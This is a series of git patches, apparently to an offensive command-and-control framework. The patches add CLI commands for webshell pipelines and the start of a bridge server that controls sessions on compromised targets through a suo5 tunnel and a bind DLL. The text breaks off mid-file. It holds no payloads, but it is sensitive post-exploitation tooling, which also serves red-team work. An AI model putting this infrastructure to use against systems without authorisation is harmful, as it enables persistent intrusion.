From 0a2310b2cb1cc523608e0d6b6d567feb61d45192 Mon Sep 17 00:00:00 2001 From: wuchulonly <1746825356@qq.com> Date: Sun, 22 Mar 2026 17:10:26 +0800 Subject: [PATCH 01/19] test(config): fix config ai example assertion --- client/command/config/commands_test.go | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/client/command/config/commands_test.go b/client/command/config/commands_test.go index efd13adb..18e344a9 100644 --- a/client/command/config/commands_test.go +++ b/client/command/config/commands_test.go @@ -24,7 +24,7 @@ func TestCommandsIncludeAIConfigSubcommand(t *testing.T) { if aiCmd.Hidden { t.Fatal("config ai command should be visible") } - if !strings.Contains(aiCmd.Example, "config ai --show") { + if !strings.Contains(aiCmd.Example, "config ai\n") { t.Fatalf("expected config ai examples, got:\n%s", aiCmd.Example) } if strings.Contains(aiCmd.Example, "ai-config --") { From 26e9705a06b32fb2235ed9e37f70cf74d6c57bbe Mon Sep 17 00:00:00 2001 From: wuchulonly <1746825356@qq.com> Date: Sun, 22 Mar 2026 17:10:32 +0800 Subject: [PATCH 02/19] test(llm): isolate env vars in resolve tests --- server/internal/llm/resolve_test.go | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) diff --git a/server/internal/llm/resolve_test.go b/server/internal/llm/resolve_test.go index e6b475f0..87badc0c 100644 --- a/server/internal/llm/resolve_test.go +++ b/server/internal/llm/resolve_test.go @@ -5,6 +5,23 @@ import ( "testing" ) +var resolveEnvKeys = []string{ + "BRIDGE_API_KEY", + "BRIDGE_OPENAI_BASE_URL", + "BRIDGE_OPENAI_API_KEY", + "BRIDGE_DEEPSEEK_BASE_URL", + "BRIDGE_DEEPSEEK_API_KEY", + "BRIDGE_GROQ_BASE_URL", + "BRIDGE_GROQ_API_KEY", + "BRIDGE_CUSTOM_LLM_BASE_URL", + "BRIDGE_CUSTOM_LLM_API_KEY", + "OPENAI_API_KEY", + "OPENROUTER_API_KEY", + "DEEPSEEK_API_KEY", + "GROQ_API_KEY", + "MOONSHOT_API_KEY", +} + func TestResolve(t *testing.T) { tests := []struct { name string @@ -117,6 +134,9 @@ func TestResolve(t *testing.T) { for _, tt := range tests { 
t.Run(tt.name, func(t *testing.T) { + for _, key := range resolveEnvKeys { + t.Setenv(key, "") + } for k, v := range tt.envs { t.Setenv(k, v) } From 536aa5d0e8ac3d0fb6db430702b3986785b99797 Mon Sep 17 00:00:00 2001 From: wuchulonly <1746825356@qq.com> Date: Sun, 22 Mar 2026 17:10:38 +0800 Subject: [PATCH 03/19] chore(deps): add suo5 and proxyclient dependencies --- go.mod | 12 +++++++++++- 1 file changed, 11 insertions(+), 1 deletion(-) diff --git a/go.mod b/go.mod index 58500c5f..74060951 100644 --- a/go.mod +++ b/go.mod @@ -10,6 +10,7 @@ require ( github.com/chainreactors/logs v0.0.0-20250312104344-9f30fa69d3c9 github.com/chainreactors/mals v0.0.0-20250717185731-227f71a931fa github.com/chainreactors/parsers v0.0.0-20250225073555-ab576124d61f + github.com/chainreactors/proxyclient v1.0.4-0.20260218115902-74a84a4535b0 github.com/chainreactors/rem v0.3.0 github.com/chainreactors/tui v0.1.1 github.com/chainreactors/utils v0.0.0-20241209140746-65867d2f78b2 @@ -46,6 +47,7 @@ require ( github.com/traefik/yaegi v0.14.3 github.com/wabzsy/gonut v1.0.0 github.com/yuin/gopher-lua v1.1.1 + github.com/zema1/suo5 v1.3.2-0.20250219115440-31983ee59a83 gopkg.in/yaml.v3 v3.0.1 gorm.io/driver/postgres v1.6.0 gorm.io/gorm v1.25.10 @@ -79,6 +81,7 @@ require ( github.com/alibabacloud-go/tea v1.4.0 // indirect github.com/alibabacloud-go/tea-utils/v2 v2.0.7 // indirect github.com/aliyun/credentials-go v1.4.7 // indirect + github.com/andybalholm/brotli v1.1.0 // indirect github.com/atotto/clipboard v0.1.4 // indirect github.com/aws/aws-sdk-go-v2 v1.41.1 // indirect github.com/aws/aws-sdk-go-v2/config v1.32.8 // indirect @@ -105,7 +108,6 @@ require ( github.com/cbroglie/mustache v1.4.0 // indirect github.com/cenkalti/backoff/v5 v5.0.3 // indirect github.com/chainreactors/fingers v0.0.0-20240702104653-a66e34aa41df // indirect - github.com/chainreactors/proxyclient v1.0.4-0.20260218115902-74a84a4535b0 // indirect github.com/charmbracelet/bubbles v0.21.1-0.20250623103423-23b8fd6302d7 // 
indirect github.com/charmbracelet/colorprofile v0.4.3 // indirect github.com/charmbracelet/harmonica v0.2.0 // indirect @@ -126,6 +128,7 @@ require ( github.com/clipperhouse/displaywidth v0.9.0 // indirect github.com/clipperhouse/stringish v0.1.1 // indirect github.com/clipperhouse/uax29/v2 v2.7.0 // indirect + github.com/cloudflare/circl v1.3.8 // indirect github.com/creack/pty v1.1.24 // indirect github.com/dlclark/regexp2 v1.11.5 // indirect github.com/docker/go-connections v0.5.0 // indirect @@ -138,9 +141,11 @@ require ( github.com/go-dedup/megophone v0.0.0-20170830025436-f01be21026f5 // indirect github.com/go-dedup/simhash v0.0.0-20170904020510-9ecaca7b509c // indirect github.com/go-dedup/text v0.0.0-20170907015346-8bb1b95e3cb7 // indirect + github.com/go-gost/gosocks5 v0.3.0 // indirect github.com/go-jose/go-jose/v4 v4.1.3 // indirect github.com/go-sql-driver/mysql v1.8.1 // indirect github.com/go-telegram-bot-api/telegram-bot-api v4.6.4+incompatible // indirect + github.com/gobwas/glob v0.2.3 // indirect github.com/goccy/go-yaml v1.12.0 // indirect github.com/gogo/protobuf v1.3.2 // indirect github.com/google/uuid v1.6.0 // indirect @@ -156,6 +161,8 @@ require ( github.com/jinzhu/inflection v1.0.0 // indirect github.com/jinzhu/now v1.1.5 // indirect github.com/json-iterator/go v1.1.13-0.20220915233716-71ac16282d12 // indirect + github.com/kataras/golog v0.1.8 // indirect + github.com/kataras/pio v0.0.11 // indirect github.com/klauspost/cpuid/v2 v2.2.7 // indirect github.com/klauspost/reedsolomon v1.12.0 // indirect github.com/lib/pq v1.10.9 // indirect @@ -184,6 +191,7 @@ require ( github.com/opencontainers/image-spec v1.1.0 // indirect github.com/pkg/errors v0.9.1 // indirect github.com/reeflective/readline v1.1.3 // indirect + github.com/refraction-networking/utls v1.6.4 // indirect github.com/riobard/go-bloom v0.0.0-20200614022211-cdc8013cb5b3 // indirect github.com/rivo/uniseg v0.4.7 // indirect github.com/saferwall/pe v1.5.6 // indirect @@ -204,6 
+212,7 @@ require ( github.com/yuin/gluamapper v0.0.0-20150323120927-d836955830e7 // indirect github.com/yuin/goldmark v1.7.4 // indirect github.com/yuin/goldmark-emoji v1.0.3 // indirect + github.com/zema1/rawhttp v0.2.0 // indirect golang.org/x/mod v0.32.0 // indirect golang.org/x/tools v0.41.0 // indirect golang.org/x/xerrors v0.0.0-20231012003039-104605ab7028 // indirect @@ -216,6 +225,7 @@ require ( replace ( github.com/imdario/mergo => dario.cat/mergo v1.0.0 github.com/miekg/dns => github.com/miekg/dns v1.1.58 + github.com/zema1/suo5 => github.com/M09Ic/suo5 v1.3.4 golang.org/x/crypto => golang.org/x/crypto v0.48.0 golang.org/x/mod => golang.org/x/mod v0.17.0 golang.org/x/net => golang.org/x/net v0.50.0 From db5889aff64a6de788591149be9a063a00766ffd Mon Sep 17 00:00:00 2001 From: wuchulonly <1746825356@qq.com> Date: Sun, 22 Mar 2026 17:10:44 +0800 Subject: [PATCH 04/19] feat(pipeline): add webshell pipeline client commands --- client/command/pipeline/commands.go | 95 +++++++++- client/command/pipeline/commands_test.go | 5 +- client/command/pipeline/webshell.go | 213 +++++++++++++++++++++++ client/command/pipeline/webshell_test.go | 170 ++++++++++++++++++ client/command/testsupport/recorder.go | 12 ++ 5 files changed, 491 insertions(+), 4 deletions(-) create mode 100644 client/command/pipeline/webshell.go create mode 100644 client/command/pipeline/webshell_test.go diff --git a/client/command/pipeline/commands.go b/client/command/pipeline/commands.go index ce805e68..c17a97ed 100644 --- a/client/command/pipeline/commands.go +++ b/client/command/pipeline/commands.go @@ -243,16 +243,107 @@ rem update interval --pipeline-id rem_graph_api_03 --agent-id uDM0BgG6 5000 remCmd.AddCommand(listremCmd, newRemCmd, startRemCmd, stopRemCmd, deleteRemCmd, updateRemCmd) + // WebShell pipeline commands + webshellCmd := &cobra.Command{ + Use: "webshell", + Short: "Manage WebShell pipelines", + Long: "List, create, start, stop, and delete WebShell bridge pipelines.", + RunE: 
func(cmd *cobra.Command, args []string) error { + return cmd.Help() + }, + } + + listWebShellCmd := &cobra.Command{ + Use: "list [listener]", + Short: "List webshell pipelines", + RunE: func(cmd *cobra.Command, args []string) error { + return ListWebShellCmd(cmd, con) + }, + } + common.BindArgCompletions(listWebShellCmd, nil, common.ListenerIDCompleter(con)) + + newWebShellCmd := &cobra.Command{ + Use: "new [name]", + Short: "Register a new webshell pipeline", + Long: "Register a CustomPipeline(type=webshell) for the webshell-bridge binary to connect to.", + Args: cobra.MaximumNArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + return NewWebShellCmd(cmd, con) + }, + Example: `~~~ +webshell new --listener my-listener +webshell new ws1 --listener my-listener +~~~`, + } + common.BindFlag(newWebShellCmd, func(f *pflag.FlagSet) { + f.StringP("listener", "l", "", "listener id") + }) + common.BindFlagCompletions(newWebShellCmd, func(comp carapace.ActionMap) { + comp["listener"] = common.ListenerIDCompleter(con) + }) + newWebShellCmd.MarkFlagRequired("listener") + + startWebShellCmd := &cobra.Command{ + Use: "start ", + Short: "Start a webshell pipeline", + Args: cobra.ExactArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + return StartWebShellCmd(cmd, con) + }, + } + common.BindFlag(startWebShellCmd, func(f *pflag.FlagSet) { + f.StringP("listener", "l", "", "listener id") + }) + common.BindFlagCompletions(startWebShellCmd, func(comp carapace.ActionMap) { + comp["listener"] = common.ListenerIDCompleter(con) + }) + common.BindArgCompletions(startWebShellCmd, nil, common.PipelineCompleter(con, webshellPipelineType)) + + stopWebShellCmd := &cobra.Command{ + Use: "stop ", + Short: "Stop a webshell pipeline", + Args: cobra.ExactArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + return StopWebShellCmd(cmd, con) + }, + } + common.BindFlag(stopWebShellCmd, func(f *pflag.FlagSet) { + f.StringP("listener", "l", "", "listener id") + }) 
+ common.BindFlagCompletions(stopWebShellCmd, func(comp carapace.ActionMap) { + comp["listener"] = common.ListenerIDCompleter(con) + }) + common.BindArgCompletions(stopWebShellCmd, nil, common.PipelineCompleter(con, webshellPipelineType)) + + deleteWebShellCmd := &cobra.Command{ + Use: "delete ", + Short: "Delete a webshell pipeline", + Args: cobra.ExactArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + return DeleteWebShellCmd(cmd, con) + }, + } + common.BindFlag(deleteWebShellCmd, func(f *pflag.FlagSet) { + f.StringP("listener", "l", "", "listener id") + }) + common.BindFlagCompletions(deleteWebShellCmd, func(comp carapace.ActionMap) { + comp["listener"] = common.ListenerIDCompleter(con) + }) + common.BindArgCompletions(deleteWebShellCmd, nil, common.PipelineCompleter(con, webshellPipelineType)) + + webshellCmd.AddCommand(listWebShellCmd, newWebShellCmd, startWebShellCmd, stopWebShellCmd, deleteWebShellCmd) + // Enable wizard for pipeline commands - common.EnableWizardForCommands(tcpCmd, httpCmd, bindCmd, newRemCmd) + common.EnableWizardForCommands(tcpCmd, httpCmd, bindCmd, newRemCmd, newWebShellCmd) // Register wizard providers for dynamic options registerWizardProviders(tcpCmd, con) registerWizardProviders(httpCmd, con) registerWizardProviders(bindCmd, con) registerWizardProviders(newRemCmd, con) + registerWizardProviders(newWebShellCmd, con) - return []*cobra.Command{tcpCmd, httpCmd, bindCmd, remCmd} + return []*cobra.Command{tcpCmd, httpCmd, bindCmd, remCmd, webshellCmd} } // registerWizardProviders registers dynamic option providers for wizard. 
diff --git a/client/command/pipeline/commands_test.go b/client/command/pipeline/commands_test.go index 075ecd86..098bdd70 100644 --- a/client/command/pipeline/commands_test.go +++ b/client/command/pipeline/commands_test.go @@ -9,8 +9,8 @@ import ( func TestCommandsExposeExpectedPipelineRoots(t *testing.T) { cmds := Commands(&core.Console{}) - if len(cmds) != 4 { - t.Fatalf("pipeline command roots = %d, want 4", len(cmds)) + if len(cmds) != 5 { + t.Fatalf("pipeline command roots = %d, want 5", len(cmds)) } want := map[string]bool{ @@ -18,6 +18,7 @@ func TestCommandsExposeExpectedPipelineRoots(t *testing.T) { consts.HTTPPipeline: true, consts.CommandPipelineBind: true, consts.CommandRem: true, + "webshell": true, } for _, cmd := range cmds { delete(want, cmd.Name()) diff --git a/client/command/pipeline/webshell.go b/client/command/pipeline/webshell.go new file mode 100644 index 00000000..692a290e --- /dev/null +++ b/client/command/pipeline/webshell.go @@ -0,0 +1,213 @@ +package pipeline + +import ( + "fmt" + + "github.com/chainreactors/IoM-go/proto/client/clientpb" + "github.com/chainreactors/malice-network/client/core" + "github.com/chainreactors/tui" + "github.com/spf13/cobra" +) + +const webshellPipelineType = "webshell" + +// ListWebShellCmd lists all webshell pipelines for a given listener. 
+func ListWebShellCmd(cmd *cobra.Command, con *core.Console) error { + listenerID := cmd.Flags().Arg(0) + pipes, err := con.Rpc.ListPipelines(con.Context(), &clientpb.Listener{ + Id: listenerID, + }) + if err != nil { + return err + } + + var webshells []*clientpb.CustomPipeline + for _, pipe := range pipes.Pipelines { + if pipe.Type == webshellPipelineType { + if custom := pipe.GetCustom(); custom != nil { + webshells = append(webshells, custom) + } + } + } + + if len(webshells) == 0 { + con.Log.Warnf("No webshell pipelines found\n") + return nil + } + + con.Log.Console(tui.RendStructDefault(webshells) + "\n") + return nil +} + +// NewWebShellCmd registers a new webshell pipeline using the CustomPipeline mechanism. +// The actual bridge binary (webshell-bridge) connects to this pipeline externally. +func NewWebShellCmd(cmd *cobra.Command, con *core.Console) error { + name := cmd.Flags().Arg(0) + listenerID, _ := cmd.Flags().GetString("listener") + + if listenerID == "" { + return fmt.Errorf("listener id is required") + } + if name == "" { + name = fmt.Sprintf("webshell_%s", listenerID) + } + + pipeline := &clientpb.Pipeline{ + Name: name, + ListenerId: listenerID, + Enable: true, + Type: webshellPipelineType, + Body: &clientpb.Pipeline_Custom{ + Custom: &clientpb.CustomPipeline{ + Name: name, + ListenerId: listenerID, + Host: resolveWebShellListenerHost(con, listenerID), + }, + }, + } + + _, err := con.Rpc.RegisterPipeline(con.Context(), pipeline) + if err != nil { + return webShellBridgeHint(listenerID, fmt.Errorf("register webshell pipeline %s: %w", name, err)) + } + + con.Log.Importantf("WebShell pipeline %s registered\n", name) + + _, err = con.Rpc.StartPipeline(con.Context(), &clientpb.CtrlPipeline{ + Name: name, + ListenerId: listenerID, + Pipeline: pipeline, + }) + if err != nil { + return webShellBridgeHint(listenerID, fmt.Errorf("start webshell pipeline %s: %w", name, err)) + } + + con.Log.Importantf("WebShell pipeline %s started\n", name) + 
con.Log.Infof("The bridge should already be running for listener %s and waiting on pipeline control.\n", listenerID) + con.Log.Infof("If the DLL is not loaded yet, the bridge will keep retrying until the rem server becomes reachable.\n") + return nil +} + +// StartWebShellCmd starts a stopped webshell pipeline. +func StartWebShellCmd(cmd *cobra.Command, con *core.Console) error { + name := cmd.Flags().Arg(0) + listenerID, _ := cmd.Flags().GetString("listener") + pipeline, err := resolveWebShellPipeline(con, name, listenerID) + if err != nil { + return err + } + listenerID = pipeline.GetListenerId() + _, err = con.Rpc.StartPipeline(con.Context(), &clientpb.CtrlPipeline{ + Name: name, + ListenerId: listenerID, + }) + if err != nil { + return webShellBridgeHint(listenerID, fmt.Errorf("start webshell pipeline %s: %w", name, err)) + } + con.Log.Importantf("WebShell pipeline %s started\n", name) + return nil +} + +// StopWebShellCmd stops a running webshell pipeline. +func StopWebShellCmd(cmd *cobra.Command, con *core.Console) error { + name := cmd.Flags().Arg(0) + listenerID, _ := cmd.Flags().GetString("listener") + pipeline, err := resolveWebShellPipeline(con, name, listenerID) + if err != nil { + return err + } + _, err = con.Rpc.StopPipeline(con.Context(), &clientpb.CtrlPipeline{ + Name: name, + ListenerId: pipeline.GetListenerId(), + }) + if err != nil { + return err + } + con.Log.Importantf("WebShell pipeline %s stopped\n", name) + return nil +} + +// DeleteWebShellCmd deletes a webshell pipeline. 
+func DeleteWebShellCmd(cmd *cobra.Command, con *core.Console) error { + name := cmd.Flags().Arg(0) + listenerID, _ := cmd.Flags().GetString("listener") + pipeline, err := resolveWebShellPipeline(con, name, listenerID) + if err != nil { + return err + } + _, err = con.Rpc.DeletePipeline(con.Context(), &clientpb.CtrlPipeline{ + Name: name, + ListenerId: pipeline.GetListenerId(), + }) + if err != nil { + return err + } + con.Log.Importantf("WebShell pipeline %s deleted\n", name) + return nil +} + +func resolveWebShellListenerHost(con *core.Console, listenerID string) string { + if listenerID == "" || con == nil { + return "" + } + if listener, ok := con.Listeners[listenerID]; ok && listener.GetIp() != "" { + return listener.GetIp() + } + listeners, err := con.Rpc.GetListeners(con.Context(), &clientpb.Empty{}) + if err != nil { + return "" + } + for _, listener := range listeners.GetListeners() { + if listener.GetId() == listenerID { + return listener.GetIp() + } + } + return "" +} + +func resolveWebShellPipeline(con *core.Console, name, listenerID string) (*clientpb.Pipeline, error) { + if name == "" { + return nil, fmt.Errorf("webshell pipeline name is required") + } + if listenerID == "" { + if pipe, ok := con.Pipelines[name]; ok { + if pipe.GetType() != webshellPipelineType { + return nil, fmt.Errorf("pipeline %s is type %s, not %s", name, pipe.GetType(), webshellPipelineType) + } + return pipe, nil + } + } + + pipes, err := con.Rpc.ListPipelines(con.Context(), &clientpb.Listener{Id: listenerID}) + if err != nil { + return nil, err + } + + var match *clientpb.Pipeline + for _, pipe := range pipes.GetPipelines() { + if pipe == nil || pipe.GetName() != name { + continue + } + if pipe.GetType() != webshellPipelineType { + return nil, fmt.Errorf("pipeline %s is type %s, not %s", name, pipe.GetType(), webshellPipelineType) + } + if match != nil && match.GetListenerId() != pipe.GetListenerId() { + return nil, fmt.Errorf("multiple webshell pipelines named %s found, 
please specify --listener", name) + } + match = pipe + } + if match == nil { + if listenerID != "" { + return nil, fmt.Errorf("webshell pipeline %s not found on listener %s", name, listenerID) + } + return nil, fmt.Errorf("webshell pipeline %s not found", name) + } + return match, nil +} + +func webShellBridgeHint(listenerID string, err error) error { + if listenerID == "" { + return err + } + return fmt.Errorf("%w; start webshell-bridge for listener %s first", err, listenerID) +} diff --git a/client/command/pipeline/webshell_test.go b/client/command/pipeline/webshell_test.go new file mode 100644 index 00000000..4234ff58 --- /dev/null +++ b/client/command/pipeline/webshell_test.go @@ -0,0 +1,170 @@ +package pipeline_test + +import ( + "context" + "errors" + "strings" + "testing" + + "github.com/chainreactors/IoM-go/proto/client/clientpb" + pipelinecmd "github.com/chainreactors/malice-network/client/command/pipeline" + "github.com/chainreactors/malice-network/client/command/testsupport" + "github.com/spf13/cobra" +) + +func TestNewWebShellCmdUsesCachedListenerHost(t *testing.T) { + h := testsupport.NewClientHarness(t) + h.Console.Listeners["listener-a"] = &clientpb.Listener{ + Id: "listener-a", + Ip: "10.10.10.10", + } + + cmd := newWebShellTestCommand(t, "--listener", "listener-a", "ws-a") + if err := pipelinecmd.NewWebShellCmd(cmd, h.Console); err != nil { + t.Fatalf("NewWebShellCmd failed: %v", err) + } + + calls := h.Recorder.Calls() + if len(calls) != 2 { + t.Fatalf("call count = %d, want 2", len(calls)) + } + if calls[0].Method != "RegisterPipeline" { + t.Fatalf("first method = %s, want RegisterPipeline", calls[0].Method) + } + + req, ok := calls[0].Request.(*clientpb.Pipeline) + if !ok { + t.Fatalf("register request type = %T, want *clientpb.Pipeline", calls[0].Request) + } + custom, ok := req.Body.(*clientpb.Pipeline_Custom) + if !ok { + t.Fatalf("register pipeline body = %T, want *clientpb.Pipeline_Custom", req.Body) + } + if custom.Custom.GetHost() != 
"10.10.10.10" { + t.Fatalf("custom host = %q, want %q", custom.Custom.GetHost(), "10.10.10.10") + } +} + +func TestNewWebShellCmdFallsBackToGetListenersForHost(t *testing.T) { + h := testsupport.NewClientHarness(t) + h.Recorder.OnListeners("GetListeners", func(_ context.Context, _ any) (*clientpb.Listeners, error) { + return &clientpb.Listeners{ + Listeners: []*clientpb.Listener{{ + Id: "listener-b", + Ip: "192.0.2.15", + }}, + }, nil + }) + + cmd := newWebShellTestCommand(t, "--listener", "listener-b", "ws-b") + if err := pipelinecmd.NewWebShellCmd(cmd, h.Console); err != nil { + t.Fatalf("NewWebShellCmd failed: %v", err) + } + + calls := h.Recorder.Calls() + if len(calls) != 3 { + t.Fatalf("call count = %d, want 3", len(calls)) + } + if calls[0].Method != "GetListeners" { + t.Fatalf("first method = %s, want GetListeners", calls[0].Method) + } + req, ok := calls[1].Request.(*clientpb.Pipeline) + if !ok { + t.Fatalf("register request type = %T, want *clientpb.Pipeline", calls[1].Request) + } + custom, ok := req.Body.(*clientpb.Pipeline_Custom) + if !ok { + t.Fatalf("register pipeline body = %T, want *clientpb.Pipeline_Custom", req.Body) + } + if custom.Custom.GetHost() != "192.0.2.15" { + t.Fatalf("custom host = %q, want %q", custom.Custom.GetHost(), "192.0.2.15") + } +} + +func TestNewWebShellCmdWrapsRegisterErrorWithBridgeHint(t *testing.T) { + h := testsupport.NewClientHarness(t) + h.Recorder.OnEmpty("RegisterPipeline", func(_ context.Context, _ any) (*clientpb.Empty, error) { + return nil, errors.New("listener not found") + }) + + cmd := newWebShellTestCommand(t, "--listener", "listener-c", "ws-c") + err := pipelinecmd.NewWebShellCmd(cmd, h.Console) + if err == nil { + t.Fatal("NewWebShellCmd error = nil, want error") + } + if !strings.Contains(err.Error(), "start webshell-bridge for listener listener-c first") { + t.Fatalf("error = %q, want bridge hint", err) + } +} + +func TestStartWebShellCmdRejectsNonWebShellPipeline(t *testing.T) { + h := 
testsupport.NewClientHarness(t) + h.Console.Pipelines["tcp-a"] = &clientpb.Pipeline{ + Name: "tcp-a", + ListenerId: "listener-a", + Type: "tcp", + } + + cmd := newWebShellTestCommand(t, "tcp-a") + err := pipelinecmd.StartWebShellCmd(cmd, h.Console) + if err == nil { + t.Fatal("StartWebShellCmd error = nil, want error") + } + if !strings.Contains(err.Error(), "pipeline tcp-a is type tcp, not webshell") { + t.Fatalf("error = %q, want pipeline type validation", err) + } + if calls := h.Recorder.Calls(); len(calls) != 0 { + t.Fatalf("call count = %d, want 0", len(calls)) + } +} + +func TestStopWebShellCmdResolvesListenerAndStopsMatchingPipeline(t *testing.T) { + h := testsupport.NewClientHarness(t) + h.Recorder.OnPipelines("ListPipelines", func(_ context.Context, in any) (*clientpb.Pipelines, error) { + listener, ok := in.(*clientpb.Listener) + if !ok { + t.Fatalf("request type = %T, want *clientpb.Listener", in) + } + if listener.GetId() != "listener-z" { + t.Fatalf("listener id = %q, want %q", listener.GetId(), "listener-z") + } + return &clientpb.Pipelines{ + Pipelines: []*clientpb.Pipeline{{ + Name: "ws-z", + ListenerId: "listener-z", + Type: "webshell", + }}, + }, nil + }) + + cmd := newWebShellTestCommand(t, "--listener", "listener-z", "ws-z") + if err := pipelinecmd.StopWebShellCmd(cmd, h.Console); err != nil { + t.Fatalf("StopWebShellCmd failed: %v", err) + } + + calls := h.Recorder.Calls() + if len(calls) != 2 { + t.Fatalf("call count = %d, want 2", len(calls)) + } + if calls[1].Method != "StopPipeline" { + t.Fatalf("second method = %s, want StopPipeline", calls[1].Method) + } + req, ok := calls[1].Request.(*clientpb.CtrlPipeline) + if !ok { + t.Fatalf("stop request type = %T, want *clientpb.CtrlPipeline", calls[1].Request) + } + if req.GetListenerId() != "listener-z" { + t.Fatalf("stop listener_id = %q, want %q", req.GetListenerId(), "listener-z") + } +} + +func newWebShellTestCommand(t *testing.T, args ...string) *cobra.Command { + t.Helper() + + cmd := 
&cobra.Command{} + cmd.Flags().StringP("listener", "l", "", "listener id") + if err := cmd.Flags().Parse(args); err != nil { + t.Fatalf("parse flags: %v", err) + } + return cmd +} diff --git a/client/command/testsupport/recorder.go b/client/command/testsupport/recorder.go index 65256b23..5eff6e15 100644 --- a/client/command/testsupport/recorder.go +++ b/client/command/testsupport/recorder.go @@ -383,6 +383,18 @@ func (r *RecorderRPC) GetAllCertificates(ctx context.Context, in *clientpb.Empty return &clientpb.Certs{}, nil } +func (r *RecorderRPC) RegisterPipeline(ctx context.Context, in *clientpb.Pipeline, opts ...grpc.CallOption) (*clientpb.Empty, error) { + return r.emptyResponse(ctx, "RegisterPipeline", in) +} + +func (r *RecorderRPC) ListPipelines(ctx context.Context, in *clientpb.Listener, opts ...grpc.CallOption) (*clientpb.Pipelines, error) { + r.recordPrimary(ctx, "ListPipelines", in) + if responder, ok := r.pipelinesResponders["ListPipelines"]; ok { + return responder(ctx, in) + } + return &clientpb.Pipelines{}, nil +} + func (r *RecorderRPC) StartPipeline(ctx context.Context, in *clientpb.CtrlPipeline, opts ...grpc.CallOption) (*clientpb.Empty, error) { return r.emptyResponse(ctx, "StartPipeline", in) } From 8e4fc972e4739bf075d68f8a1d584006e8aa3c76 Mon Sep 17 00:00:00 2001 From: wuchulonly <1746825356@qq.com> Date: Sun, 22 Mar 2026 17:10:52 +0800 Subject: [PATCH 05/19] feat(webshell-bridge): add webshell bridge server binary --- server/cmd/webshell-bridge/bridge.go | 779 +++++++++++++++++++ server/cmd/webshell-bridge/bridge_test.go | 509 ++++++++++++ server/cmd/webshell-bridge/channel.go | 273 +++++++ server/cmd/webshell-bridge/channel_test.go | 541 +++++++++++++ server/cmd/webshell-bridge/config.go | 13 + server/cmd/webshell-bridge/main.go | 67 ++ server/cmd/webshell-bridge/main_test.go | 15 + server/cmd/webshell-bridge/session.go | 118 +++ server/cmd/webshell-bridge/transport.go | 131 ++++ server/cmd/webshell-bridge/transport_test.go | 58 ++ 10 files 
changed, 2504 insertions(+) create mode 100644 server/cmd/webshell-bridge/bridge.go create mode 100644 server/cmd/webshell-bridge/bridge_test.go create mode 100644 server/cmd/webshell-bridge/channel.go create mode 100644 server/cmd/webshell-bridge/channel_test.go create mode 100644 server/cmd/webshell-bridge/config.go create mode 100644 server/cmd/webshell-bridge/main.go create mode 100644 server/cmd/webshell-bridge/main_test.go create mode 100644 server/cmd/webshell-bridge/session.go create mode 100644 server/cmd/webshell-bridge/transport.go create mode 100644 server/cmd/webshell-bridge/transport_test.go diff --git a/server/cmd/webshell-bridge/bridge.go b/server/cmd/webshell-bridge/bridge.go new file mode 100644 index 00000000..2f1d374a --- /dev/null +++ b/server/cmd/webshell-bridge/bridge.go @@ -0,0 +1,779 @@ +package main + +import ( + "context" + "errors" + "fmt" + "io" + "strconv" + "sync" + "time" + + "strings" + + "github.com/chainreactors/IoM-go/consts" + mtls "github.com/chainreactors/IoM-go/mtls" + "github.com/chainreactors/IoM-go/proto/client/clientpb" + "github.com/chainreactors/IoM-go/proto/implant/implantpb" + "github.com/chainreactors/IoM-go/proto/services/listenerrpc" + iomtypes "github.com/chainreactors/IoM-go/types" + "github.com/chainreactors/logs" + "github.com/chainreactors/malice-network/helper/cryptography" + "github.com/chainreactors/malice-network/helper/implanttypes" + "google.golang.org/grpc" + "google.golang.org/grpc/codes" + "google.golang.org/grpc/metadata" + "google.golang.org/grpc/status" +) + +const ( + pipelineType = "webshell" + checkinInterval = 30 * time.Second + retryBaseDelay = 2 * time.Second + retryMaxDelay = 60 * time.Second + retryMaxAttempts = 20 +) + +// Bridge is the WebShell bridge that connects to the IoM server via +// ListenerRPC and manages webshell-backed sessions through a suo5 tunnel. +// +// The bridge owns the listener runtime only. 
Custom pipelines are created and +// controlled through pipeline start/stop events from the server. +type Bridge struct { + cfg *Config + transport dialTransport + + conn *grpc.ClientConn + rpc listenerrpc.ListenerRPCClient + jobStream listenerrpc.ListenerRPC_JobStreamClient + + activeMu sync.Mutex + active *pipelineRuntime +} + +type pipelineRuntime struct { + name string + ctx context.Context + cancel context.CancelFunc + spiteStream listenerrpc.ListenerRPC_SpiteStreamClient + sendMu sync.Mutex + sessions sync.Map // sessionID -> *Session + sessionsByRawID sync.Map // rawSID (uint32) -> *Session (for CtrlListenerSyncSession lookup) + streamTasks sync.Map // "sessionID:taskID" -> context.CancelFunc (pump goroutine) + secureConfig *implanttypes.SecureConfig + done chan struct{} +} + +// NewBridge creates a new bridge instance. +func NewBridge(cfg *Config) (*Bridge, error) { + transport, err := NewTransport(cfg.Suo5URL) + if err != nil { + return nil, fmt.Errorf("init transport: %w", err) + } + + return &Bridge{ + cfg: cfg, + transport: transport, + }, nil +} + +// Start runs the bridge lifecycle: +// 1. Connect to server via mTLS +// 2. Register listener +// 3. Open JobStream +// 4. 
Wait for pipeline start/stop controls +func (b *Bridge) Start(parent context.Context) error { + ctx, cancel := context.WithCancel(parent) + defer cancel() + + if err := b.connect(ctx); err != nil { + return fmt.Errorf("connect: %w", err) + } + defer b.shutdown() + defer b.conn.Close() + logs.Log.Important("connected to server") + + go func() { + <-ctx.Done() + if b.conn != nil { + _ = b.conn.Close() + } + }() + + if _, err := b.rpc.RegisterListener(b.listenerCtx(ctx), &clientpb.RegisterListener{ + Name: b.cfg.ListenerName, + Host: b.cfg.ListenerIP, + }); err != nil { + return fmt.Errorf("register listener: %w", err) + } + logs.Log.Importantf("registered listener: %s", b.cfg.ListenerName) + + var err error + b.jobStream, err = b.rpc.JobStream(b.listenerCtx(ctx)) + if err != nil { + return fmt.Errorf("open job stream: %w", err) + } + logs.Log.Importantf("waiting for pipeline %s control messages", b.cfg.PipelineName) + + return b.runJobLoop(ctx) +} + +// connectDLL establishes a malefic channel to the bind DLL on the target +// through the suo5 tunnel. Retries with exponential backoff up to +// retryMaxAttempts before giving up. 
